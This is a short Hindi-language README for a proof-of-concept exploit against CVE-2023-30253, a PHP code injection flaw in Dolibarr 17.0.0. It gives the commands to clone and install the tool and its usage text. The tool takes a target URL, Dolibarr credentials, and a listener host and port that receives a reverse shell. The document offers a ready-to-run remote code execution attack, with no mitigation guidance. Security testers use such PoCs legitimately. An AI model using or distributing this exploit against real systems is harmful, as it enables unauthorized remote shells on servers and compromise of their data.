
मुझे CVE-2023-30253 के लिए कोई PoC नहीं मिला, इसलिए मैंने एक प्रभावी PoC विकसित किया।
CVE-2023-30253 PoC
यह CVE-2023-30253 (Dolibarr 17.0.0 PHP Code Injection) के लिए मेरा PoC है, जब CMS वेबसाइट प्लगइन (कोर) सक्षम होता है, तो एक प्रमाणित हमलावर एप्लिकेशन प्रतिबंधों को दरकिनार करके php कोड इंजेक्शन के माध्यम से रिमोट कमांड निष्पादन प्राप्त कर सकता है।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/g4nkd/CVE-2023-30253-PoC.git
cd CVE-2023-30253-PoC
pip install -r requirements.txt
python3 exploit.py -h
usage: exploit.py [-h] -lhost LHOST -lport LPORT -rhost RHOST -user USER -pass PASSWORD
Exploit for CVE-2023-30253
options:
-h, --help show this help message and exit
-lhost LHOST Local Host (this host will receive the shell)
-lport LPORT Local PORT
-rhost RHOST Rhost url, example: http://site.com/
-user USER Username for Dolibarr
-pass PASSWORD Password for Dolibarr